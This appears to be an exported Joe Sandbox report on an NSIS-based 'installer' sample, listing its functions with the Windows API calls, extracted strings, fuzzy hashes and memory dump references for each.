Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC

Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
FindClose.KERNEL32(00000000), ref: 004062EC

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
ShowWindow.USER32(?), ref: 004054D2
DestroyWindow.USER32 ref: 004054E6
SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
GetDlgItem.USER32(?,?), ref: 00405523
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
IsWindowEnabled.USER32(00000000), ref: 0040553E
GetDlgItem.USER32(?,00000001), ref: 004055ED
GetDlgItem.USER32(?,00000002), ref: 004055F7
SetClassLongW.USER32(?,000000F2,?), ref: 00405611
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
GetDlgItem.USER32(?,00000003), ref: 00405708
ShowWindow.USER32(00000000,?), ref: 0040572A
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
EnableWindow.USER32(?,?), ref: 00405757
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
EnableMenuItem.USER32(00000000), ref: 00405774
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
SetWindowTextW.USER32(?,00447240), ref: 004057DC
ShowWindow.USER32(?,0000000A), ref: 00405910

Strings

@rD, xrefs: 004057B9

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: @rD
API String ID: 3282139019-3814967855
Opcode ID: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
Opcode Fuzzy Hash: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

CreateDirectory: "%s" (%d), xrefs: 004017BF
Rename on reboot: %s, xrefs: 00401943
CreateDirectory: "%s" created, xrefs: 00401849
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
SetFileAttributes failed., xrefs: 004017A1
detailprint: %s, xrefs: 00401679
Rename failed: %s, xrefs: 0040194B
Rename: %s, xrefs: 004018F8
Call: %d, xrefs: 0040165A
SetFileAttributes: "%s":%08X, xrefs: 0040177B
BringToFront, xrefs: 004016BD
CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
Sleep(%d), xrefs: 0040169D
Aborting: "%s", xrefs: 0040161D
Jump: %d, xrefs: 00401602

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
RegisterClassW.USER32(0046AD60), ref: 00405B0A
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B

Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30

ShowWindow.USER32(00000005,00000000), ref: 00405B91
LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
RegisterClassW.USER32(0046AD60), ref: 00405BD3
DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2

Strings

@rD, xrefs: 00405965
RichEdit, xrefs: 00405BC4
.DEFAULT\Control Panel\International, xrefs: 00405999
.exe, xrefs: 00405A3D
B%F, xrefs: 00405A1F
RichEdit20A, xrefs: 00405BB6, 00405BBB
Control Panel\Desktop\ResourceLocale, xrefs: 00405972
RichEd32, xrefs: 00405BA8
RichEd20, xrefs: 00405B9D
_Nb, xrefs: 00405AD1
@%F, xrefs: 004059F6

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-1650083594
Opcode ID: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
Opcode Fuzzy Hash: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

lstrcatW.KERNEL32(00000000,00000000,DifferencesRecognisedImmune,004CB0B0,00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,DifferencesRecognisedImmune,DifferencesRecognisedImmune,00000000,00000000,DifferencesRecognisedImmune,004CB0B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Strings

DifferencesRecognisedImmune, xrefs: 00401A53, 00401A5C, 00401A69, 00401A7B, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39
File: error, user retry, xrefs: 00401B40
File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81
File: error, user abort, xrefs: 00401B53
File: wrote %d to "%s", xrefs: 00401BD0
File: error creating "%s", xrefs: 00401AF0
File: error, user cancel, xrefs: 00401B93

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: DifferencesRecognisedImmune$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
API String ID: 4286501637-4193119794
Opcode ID: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
Opcode Fuzzy Hash: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403598
GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600

Strings

Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
Null, xrefs: 0040367E
Error launching installer, xrefs: 004035D7
soft, xrefs: 00403675
Inst, xrefs: 0040366C

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033E7
GetTickCount.KERNEL32 ref: 00403464
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
wsprintfW.USER32 ref: 004034A4
WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A

Strings

... %d%%, xrefs: 0040349E
X1C, xrefs: 004033ED
X1C, xrefs: 0040343C
P1B, xrefs: 004033A9

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: ... %d%%$P1B$X1C$X1C
API String ID: 651206458-1535804072
Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
Opcode Fuzzy Hash: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GlobalFree.KERNELBASE(00000000), ref: 00402387

Strings

DifferencesRecognisedImmune, xrefs: 00401EFB, 00401F00, 00401F1A
Pop: stack empty, xrefs: 00401F2C
Exch: stack < %d elements, xrefs: 00401ED8

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: DifferencesRecognisedImmune$Exch: stack < %d elements$Pop: stack empty
API String ID: 1459762280-2188610605
Opcode ID: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
Opcode Fuzzy Hash: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

GlobalFree.KERNELBASE(00000000), ref: 00402387

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
